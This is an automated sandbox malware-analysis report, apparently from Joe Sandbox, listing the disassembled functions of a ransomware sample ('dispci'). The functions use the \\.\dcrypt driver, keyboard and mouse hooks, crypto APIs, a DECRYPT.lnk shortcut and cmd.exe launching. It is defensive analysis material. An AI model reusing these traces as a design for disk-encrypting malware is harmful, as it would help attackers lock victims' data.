                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _errno_getptd_invalid_parameter_noinfoiswctype
                                              • String ID: A$Z
                                              • API String ID: 3686281101-4098844585
                                              • Opcode ID: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                              • Instruction ID: e8892fd04278afec063ccfcd91f742043971fb1e64d285f22b02d38a0e3605e3
                                              • Opcode Fuzzy Hash: 7471cf975a6c2e899fc60685f9a1016f05e03f026487ea75407b715c0f360e66
                                              • Instruction Fuzzy Hash: 6F218673F1C6A281EBA05F15A14017976A2EB90BE0FA84131EADD477E5CEACE8C1C700
                                              Function 00007FF60975224C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc$FilePointer
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 566066777-3502785670
                                              • Opcode ID: ae4bdf1545d5b3bea47cb7be4399879195951017214af75440566f936ed4c44c
                                              • Instruction ID: 4f31b962ec4e139f4c4eba070f3608804e8505c9bc196b36e807906998069994
                                              • Opcode Fuzzy Hash: ae4bdf1545d5b3bea47cb7be4399879195951017214af75440566f936ed4c44c
                                              • Instruction Fuzzy Hash: A0111C33B19B4682DB94CF15E84406D73A6FB48BC4B258235DAAC83764EF79D996C700
                                              Function 00007FF609753A80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28libraryloaderCOMMON
                                              Download Yara Rule
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: LocalAlloc$kernel32
                                              • API String ID: 1646373207-3502785670
                                              • Opcode ID: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                              • Instruction ID: 8451a5be103e507475ec98c021735440de6e25de291eb405c6d73718ad05d218
                                              • Opcode Fuzzy Hash: 768c83978b35878a8f958784c4e0d899e0f3712db5d3c7c46bf7aa8f2928ed0d
                                              • Instruction Fuzzy Hash: 7AF0B452B0564781EEC89F56E4814346362EF48BC4F584134DB0D87754EEBCD098C300
                                              Function 00007FF609755814 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetModuleHandleW.KERNEL32(?,?,000000FF,00007FF60975585D,?,?,00000028,00007FF609758D1D,?,?,00000000,00007FF6097574D0,?,?,?,00007FF609757395), ref: 00007FF609755823
                                              • GetProcAddress.KERNEL32(?,?,000000FF,00007FF60975585D,?,?,00000028,00007FF609758D1D,?,?,00000000,00007FF6097574D0,?,?,?,00007FF609757395), ref: 00007FF609755838
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: AddressHandleModuleProc
                                              • String ID: CorExitProcess$mscoree.dll
                                              • API String ID: 1646373207-1276376045
                                              • Opcode ID: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                              • Instruction ID: ee1154dec472059b24c6f809fa40b4ad7bb6d5773c7e38ab9f66baf031a016e6
                                              • Opcode Fuzzy Hash: 2e7156098e7d4b22c2cdf77a18da4477a529ad48e7687adc2817a342e21d314d
                                              • Instruction Fuzzy Hash: 18E01212F1974282FE9D5F60A8845341762AF88784B6C1538C81EC63A0EEACB58EC700
                                              Function 00007FF609756FF4 Relevance: 6.1, APIs: 4, Instructions: 102COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: ByteCharMultiWide$StringTypemalloc
                                              • String ID:
                                              • API String ID: 4066956681-0
                                              • Opcode ID: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                              • Instruction ID: 203b831631e3728478653bdb0b492ca452cbb08b802c8a9df4b643df86dd480c
                                              • Opcode Fuzzy Hash: 3c67af3a7237179b16aed0a02624798f9160055e14e0f8ff9ff85d4aae7233b0
                                              • Instruction Fuzzy Hash: 77418423A04B8187EF949F2698005A967D6FF48BE8F684635EE2D877D5DFBDE4058300
                                              Function 00007FF60975509C Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.1282016302.00007FF609751000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF609750000, based on PE: true
                                              • Associated: 00000013.00000002.1281998361.00007FF609750000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282036504.00007FF60975A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282067875.00007FF60975E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                              • Associated: 00000013.00000002.1282097163.00007FF609761000.00000002.00000001.01000000.00000007.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_7ff609750000_D99F.jbxd
                                              Similarity
                                              • API ID: _amsg_exit_getptd$_lock
                                              • String ID:
                                              • API String ID: 3670291111-0
                                              • Opcode ID: 993534dfc6f72033878c1470825db430e2c975b239a47a9683bd1f3504e1619f
                                              • Instruction ID: 95095a564246e7fdefc0be0601593147cb494cbbcab390a96fcbe1fca492038f
                                              • Opcode Fuzzy Hash: 993534dfc6f72033878c1470825db430e2c975b239a47a9683bd1f3504e1619f
                                              • Instruction Fuzzy Hash: 75F01D63E0914286FAD8AF61C8517B82662EF45784F7C0135EA0DCB3D2EE9CA841C351

                                              Executed Functions

                                              Function 00A84070 Relevance: 56.1, APIs: 30, Strings: 2, Instructions: 125threadtimewindowCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetDesktopWindow.USER32 ref: 00A84084
                                              • GetForegroundWindow.USER32 ref: 00A84090
                                              • GetShellWindow.USER32 ref: 00A8409C
                                              • GetCapture.USER32 ref: 00A840A8
                                              • GetClipboardOwner.USER32 ref: 00A840B4
                                              • GetOpenClipboardWindow.USER32 ref: 00A840C0
                                              • GetCurrentProcessId.KERNEL32 ref: 00A840CC
                                              • GetCurrentThreadId.KERNEL32 ref: 00A840D8
                                              • GetTickCount.KERNEL32 ref: 00A840E4
                                              • GetFocus.USER32 ref: 00A840F0
                                              • GetActiveWindow.USER32 ref: 00A840FC
                                              • GetKBCodePage.USER32 ref: 00A84108
                                              • GetCursor.USER32 ref: 00A84114
                                              • GetLastActivePopup.USER32(?), ref: 00A84127
                                              • GetProcessHeap.KERNEL32 ref: 00A84133
                                              • GetQueueStatus.USER32(000004BF), ref: 00A84144
                                              • GetInputState.USER32 ref: 00A84150
                                              • GetMessageTime.USER32 ref: 00A8415C
                                              • GetOEMCP.KERNEL32 ref: 00A84168
                                              • GetCursorInfo.USER32(?), ref: 00A84193
                                              • GetCaretPos.USER32(?), ref: 00A841A0
                                              • GetCurrentThread.KERNEL32 ref: 00A841C2
                                              • GetThreadTimes.KERNEL32(00000000), ref: 00A841C9
                                              • GetCurrentProcess.KERNEL32(?,?,?,?), ref: 00A841EE
                                              • GetProcessTimes.KERNELBASE(00000000), ref: 00A841F1
                                              • GetCurrentProcess.KERNEL32(00000028,00000028), ref: 00A841FD
                                              • K32GetProcessMemoryInfo.KERNEL32(00000000), ref: 00A84200
                                              • QueryPerformanceCounter.KERNEL32(?), ref: 00A8420A
                                              • GlobalMemoryStatusEx.KERNELBASE(00000040), ref: 00A84214
                                              • EnumWindows.USER32(Function_00003DF0,00000117), ref: 00A8427D
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Process$CurrentWindow$Thread$ActiveClipboardCursorInfoLastMemoryStatusTimesValue$CaptureCaretCodeControlCountCounterCreateDesktopDeviceEnumErrorFileFocusForegroundGlobalHeapInputMessageOpenOwnerPagePerformancePopupQueryQueueShellStateTickTimeWindows
                                              • String ID: ($@
                                              • API String ID: 3079641271-1311469180
                                              • Opcode ID: 8ef544985c8ea18b8c2d256ef5837946824f6f2a1ab58d00c67ba5b4367ec439
                                              • Instruction ID: 792982b3c501cced0db364da695f52371a6f192301f51d8b73558c108af135bf
                                              • Opcode Fuzzy Hash: 8ef544985c8ea18b8c2d256ef5837946824f6f2a1ab58d00c67ba5b4367ec439
                                              • Instruction Fuzzy Hash: 35519676E002199FCF15EFF0ED4CAD9BBB4BB18301F00459AE50AA7250EF749A868F50
                                              Function 00A842A0 Relevance: 15.1, APIs: 10, Instructions: 121encryptionthreadmemoryCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • VirtualAlloc.KERNELBASE(00000000,00002000,00003000,00000040), ref: 00A842CD
                                                • Part of subcall function 00A82020: TlsGetValue.KERNEL32(?), ref: 00A8202B
                                                • Part of subcall function 00A82020: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • VirtualLock.KERNEL32(?,00002000), ref: 00A84307
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84337
                                              • SetWindowsHookExW.USER32(00000007,Function_00003F00,00000000,00000000), ref: 00A84349
                                              • GetCurrentThreadId.KERNEL32 ref: 00A84350
                                              • SetWindowsHookExW.USER32(00000002,Function_00003FC0,00000000,00000000), ref: 00A8435C
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000000), ref: 00A84378
                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,00000008), ref: 00A8438B
                                              • CryptGenRandom.ADVAPI32(?,00000200,?), ref: 00A843A8
                                              • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00A8440F
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Crypt$Context$AcquireCurrentHookThreadVirtualWindows$AllocCreateFileLockRandomReleaseValue
                                              • String ID:
                                              • API String ID: 330245633-0
                                              • Opcode ID: 571b6768981426d9fec3f06a91e852a040ff53463fc20cf789643df54e3ad6e1
                                              • Instruction ID: c2fcf7a8f42a98613214fb73718716dae05e49f8f5c900c64081064e3e41d78e
                                              • Opcode Fuzzy Hash: 571b6768981426d9fec3f06a91e852a040ff53463fc20cf789643df54e3ad6e1
                                              • Instruction Fuzzy Hash: E3417771B40319AFEB20EBA4DC49F9A77B8DB14700F110196F909EB1D1DE74AD418B91
                                              Function 00A82020 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57fileCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 143 a82020-a82035 TlsGetValue 144 a82068-a8208b DeviceIoControl 143->144 145 a82037-a8204e CreateFileW 143->145 146 a82098-a8209e 144->146 147 a8208d-a82097 GetLastError 144->147 148 a8205a-a82062 TlsSetValue 145->148 149 a82050-a82059 145->149 148->144
                                              APIs
                                              • TlsGetValue.KERNEL32(?), ref: 00A8202B
                                              • CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A82043
                                              • TlsSetValue.KERNEL32(?,00000000), ref: 00A82062
                                              • DeviceIoControl.KERNEL32(00000000,?,?,?,?,?,?,00000000), ref: 00A82083
                                              • GetLastError.KERNEL32 ref: 00A8208D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ControlCreateDeviceErrorFileLast
                                              • String ID: \\.\dcrypt
                                              • API String ID: 2163648868-1945893055
                                              • Opcode ID: b778d9bc8b3d918ba5940d458c0a5ce31ce78e64159431f5fda3b341a904b98d
                                              • Instruction ID: f25223d3b4d802300e09f911c0240ab7b41e5ee3ab362884044bd80b0400a943
                                              • Opcode Fuzzy Hash: b778d9bc8b3d918ba5940d458c0a5ce31ce78e64159431f5fda3b341a904b98d
                                              • Instruction Fuzzy Hash: 66015E76A41615BBDB20DFA9EC49EBB37BCEB48361B004245FD09C3250DA719E11C7E0
                                              Function 00A843B7 Relevance: 1.5, APIs: 1, Instructions: 35encryptionCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 174 a843b7-a843be 175 a843c0-a843db 174->175 176 a843dd-a843e2 call a83d00 175->176 177 a843e7-a843ee 175->177 176->177 177->175 178 a843f0-a843fb 177->178 181 a84400-a84405 178->181 181->181 182 a84407-a84415 CryptReleaseContext call a84070 181->182 185 a8441a-a8442b call a85c9f 182->185
                                              APIs
                                              • CryptReleaseContext.ADVAPI32(?,000001FF), ref: 00A8440F
                                                • Part of subcall function 00A83D00: TlsGetValue.KERNEL32(?), ref: 00A83D19
                                                • Part of subcall function 00A83D00: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A83D31
                                                • Part of subcall function 00A83D00: TlsSetValue.KERNEL32(?,00000000), ref: 00A83D46
                                                • Part of subcall function 00A83D00: DeviceIoControl.KERNEL32(00000000,00220020,01490000,00000000,00000000,00000000,?,00000000), ref: 00A83D5E
                                                • Part of subcall function 00A83D00: GetLastError.KERNEL32 ref: 00A83D68
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Value$ContextControlCreateCryptDeviceErrorFileLastRelease
                                              • String ID:
                                              • API String ID: 3296926122-0
                                              • Opcode ID: 5fd87b0ec684c80ae16ca6cd15aeb35b2480ec6a96f174fda5b705effa5aeb8c
                                              • Instruction ID: d93e770b3825b4228ddeb648ea877e01a3e78d3e64f91b330e6c717c2b219f89
                                              • Opcode Fuzzy Hash: 5fd87b0ec684c80ae16ca6cd15aeb35b2480ec6a96f174fda5b705effa5aeb8c
                                              • Instruction Fuzzy Hash: 37F0B431B042548FEB15FBA4E98879E77B0EB58310F1105AAD896CB262DF345D428BC1
                                              Function 00A85150 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 109sleepCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 13 a85150-a8516a 14 a85170-a85184 CoInitialize 13->14 15 a852b4-a852c1 call a85c9f 13->15 14->15 17 a8518a-a851a7 14->17 20 a851ad-a85204 GetModuleFileNameW 17->20 21 a852ae 17->21 25 a8520a-a85217 GetVersion 20->25 26 a852a0-a852ab 20->26 21->15 27 a85219-a85225 25->27 28 a85227-a8522e 25->28 26->21 29 a85233-a85241 ExpandEnvironmentStringsW 27->29 28->29 30 a85244-a8524e 29->30 30->30 31 a85250-a8529b Sleep 30->31 34 a8529e-a8529f 31->34 34->26
                                              APIs
                                              • CoInitialize.OLE32(00000000), ref: 00A8517C
                                              • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00A851BB
                                              • GetVersion.KERNEL32 ref: 00A8520A
                                              • ExpandEnvironmentStringsW.KERNEL32(%ALLUSERSPROFILE%,?,00000410), ref: 00A85233
                                              • Sleep.KERNELBASE(00001388), ref: 00A8528A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: EnvironmentExpandFileInitializeModuleNameSleepStringsVersion
                                              • String ID: %ALLUSERSPROFILE%$%PUBLIC%$DECRYPT$\Desktop\DECRYPT.lnk
                                              • API String ID: 789788428-674991135
                                              • Opcode ID: 382bb985ff2cda9ef8e64a9cc99c73b30516f2e2357789e6cb13373213d39ede
                                              • Instruction ID: e802dd3fe516501f43ecfd7c6776f519f8b4b0625b24c9c262a2d92cc12ab216
                                              • Opcode Fuzzy Hash: 382bb985ff2cda9ef8e64a9cc99c73b30516f2e2357789e6cb13373213d39ede
                                              • Instruction Fuzzy Hash: CE417135B41714AFDB10EBA8CC86F9973B5FF89700F108185F9069B2A0DA70AE46CF51
                                              Function 00A83DF0 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 77threadCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                              • GetWindowThreadProcessId.USER32(?,?), ref: 00A83E1A
                                              • GetClientRect.USER32 ref: 00A83E3D
                                              • GetWindowRect.USER32(?,?), ref: 00A83E49
                                              • GetWindowInfo.USER32(?,?), ref: 00A83E55
                                              • GetGUIThreadInfo.USER32(?,?), ref: 00A83E65
                                              • GetWindowTextW.USER32(?,?,00000104), ref: 00A83E79
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: Window$InfoRectThread$ClientProcessText
                                              • String ID: 0$<
                                              • API String ID: 2833114922-95265187
                                              • Opcode ID: 43e0f7992527a158c2773067ed98c48611d71c6de15f15d7ebe48a233621a9a5
                                              • Instruction ID: 7f21ae4276b804c908e21ea24d560ceee4932e63c4707ef7645d98f1b34f7fa5
                                              • Opcode Fuzzy Hash: 43e0f7992527a158c2773067ed98c48611d71c6de15f15d7ebe48a233621a9a5
                                              • Instruction Fuzzy Hash: F52173722043059FDB20EF64D844AABB7F8FF95700F00491EF485C7260DB749A0ACB92
                                              Function 00A85810 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 71processstringCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              APIs
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                              • GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                              • GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                              • lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                              • CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
                                              • API ID: CreateDirectoryEnvironmentProcessSystemVariable_vswprintf_slstrcat
                                              • String ID: /c %ws$ComSpec$D$\cmd.exe
                                              • API String ID: 306406079-851825698
                                              • Opcode ID: 029b27394807ddf8b09680c21b346ea9f7313d2708eb3e135445ce6c17bbd253
                                              • Instruction ID: 177b584861b8bbd1adc9c52e88c467bf069f1f6d0696be9c660ca1227ab1d47e
                                              • Opcode Fuzzy Hash: 029b27394807ddf8b09680c21b346ea9f7313d2708eb3e135445ce6c17bbd253
                                              • Instruction Fuzzy Hash: 7B219871F40648ABEF14DB70CC45BA977B8AB58700F50059AAA09AA1D0DEB4AE448F54
                                              Function 00A85660 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 99sleepsynchronizationCOMMON
                                              Download Yara Rule

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 88 a85660-a856ae call a852d0 call a857b0 call a85810 95 a8576a-a8576d 88->95 96 a856b4-a856bc 88->96 97 a85799-a857af call a85150 call a85c9f 95->97 98 a8576f-a8577d 95->98 99 a856c0-a856c6 96->99 100 a8578a-a85796 call a84550 98->100 101 a8577f-a85785 call a85510 98->101 103 a856c8-a856cb 99->103 104 a856e6-a856e8 99->104 100->97 101->100 105 a856cd-a856d5 103->105 106 a856e2-a856e4 103->106 107 a856eb-a856ed 104->107 105->104 111 a856d7-a856e0 105->111 106->107 107->97 112 a856f3-a856f9 107->112 111->99 111->106 112->97 115 a856ff-a85756 CreateEventW SetConsoleCtrlHandler call a85b90 call a86285 call a85370 call a82020 WaitForSingleObject 112->115 125 a85758 call a85bf0 115->125 126 a8575d-a85768 Sleep 115->126 125->126 126->97
                                              APIs
                                                • Part of subcall function 00A852D0: GetFileAttributesW.KERNELBASE(C:\Windows\cscc.dat), ref: 00A852DF
                                                • Part of subcall function 00A852D0: CreateFileW.KERNELBASE(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85301
                                                • Part of subcall function 00A852D0: CloseHandle.KERNEL32(00000000), ref: 00A85309
                                                • Part of subcall function 00A852D0: CreateFileW.KERNEL32(\\.\dcrypt,00000000,00000000,00000000,00000003,00000000,00000000), ref: 00A85320
                                                • Part of subcall function 00A852D0: TlsSetValue.KERNEL32(?,00000000), ref: 00A8532E
                                                • Part of subcall function 00A857B0: _vswprintf_s.LIBCMT ref: 00A857DB
                                                • Part of subcall function 00A85810: GetEnvironmentVariableW.KERNEL32(ComSpec,?,0000030C,?,?), ref: 00A8585A
                                                • Part of subcall function 00A85810: GetSystemDirectoryW.KERNEL32(?,0000030C), ref: 00A85870
                                                • Part of subcall function 00A85810: lstrcatW.KERNEL32(?,\cmd.exe), ref: 00A85886
                                                • Part of subcall function 00A85810: CreateProcessW.KERNELBASE(?,?,00000000,00000000,00000000,08000000,00000000,00000000,?,?,?,?), ref: 00A858EE
                                              • CreateEventW.KERNEL32(?,00000001,?,?), ref: 00A85704
                                              • SetConsoleCtrlHandler.KERNEL32(Function_00005620,00000001), ref: 00A85716
                                              • WaitForSingleObject.KERNEL32(?,00000000), ref: 00A8574E
                                              • Sleep.KERNEL32(00001388), ref: 00A85762
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000020.00000002.1362122704.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true
                                              • Associated: 00000020.00000002.1362086087.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362185981.0000000000A93000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362272391.0000000000A98000.00000004.00000001.01000000.00000008.sdmpDownload File
                                              • Associated: 00000020.00000002.1362321945.0000000000ACE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_32_2_a80000_dispci.jbxd
                                              Similarity
